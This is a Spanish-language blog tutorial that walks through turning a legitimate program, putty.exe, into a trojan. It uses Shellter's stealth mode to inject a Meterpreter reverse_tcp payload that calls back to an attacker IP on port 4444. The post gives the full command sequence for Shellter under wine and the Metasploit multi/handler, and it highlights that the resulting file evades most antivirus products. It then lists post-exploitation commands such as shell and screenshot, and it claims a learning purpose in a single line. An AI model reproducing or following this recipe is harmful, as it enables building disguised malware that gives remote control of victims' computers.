Inyectar código malicioso a un programa ejecutable usando shellter y metasploit

por | Marzo 29, 2017

Hola amigos, en este articulo se expone como crear un archivo malicioso (troyano) disfrazado de un programa ejecutable legitimo.

Escenario:

  • Equipo victima: Windows 8.1 de 64 bits con dirección IP 192.168.0.2
  • Equipo atacante: Parrot Security con dirección IP 192.168.0.3
  • Paquete shellter_v6.0.zip
  • Paquete wine instalado.

Para iniciar se descarga el paquete shellter desde la web del autor desde acá.

Una vez descargado el paquete se paquete se procede con la descompresión del mismo;

unzip -e shellter_v6.0.zip

Se copia y el archivo original (ejecutable) al directorio recién descompreso. En este ejemplo descargue el archivo ejecutable putty.exe o bien se puede utilizar el programa que viene como ejemplo en el directorio /usr/share/windows-binaries

cp putty.exe shellter

Posteriormente se ingresa al directorio y se ejecuta por medio de la siguiente sintaxis;

cd shellter

sudo wine shellter.exe

Se inicia el proceso de inyección de código (troyano) en el ejecutable. Se selecciona la opción A (automático);

Se ingresa el nombre  PE (Portable Ejecutable);

Se selecciona el modo stealth (sigiloso), se carga el payload , se agrega la dirección IP atacante (192.168.0.3) y el puerto de escucha (4444) u cualquier otro que desee;

Terminado el proceso se cambia a otra pestaña de la terminal y se ejecuta el metasploit;

msfconsole

Se procede a ingresar los siguientes parámetros;

  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set lhost 192.168.0.3
  • show options

Solamente restar ejecutar el exploit por medio de la siguiente sintaxis;

exploit

Del lado del equipo victima se ejecuta el programa ejecutable (putty.exe) el cual es indetectable para la mayoría de los antivirus conocidos (ver imágenes posteriores) y a lo inmediato se obtiene el acceso al equipo. Aqui puede hacer uso de la ayuda (help) para conocer los comandos que desee ejecutar. Por ejemplo sysinfo para conocer la información del equipo victima, shell para ejecutar comandos windows, screenshot para hacer capturas de pantallas, etc.

Se escaneo el ejecutable con el troyano dentro con el sistema antivirus de pago Mcafee y este fue el resultado;

Y por último se realizo el escaneo con los antivirus en linea más conocidos, desde el sitio web nodistribute.com , obteniendo el siguiente resultado;

Nota: Este articulo se creo con fines de aprendizaje.

Saludos.

Print Friendly

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *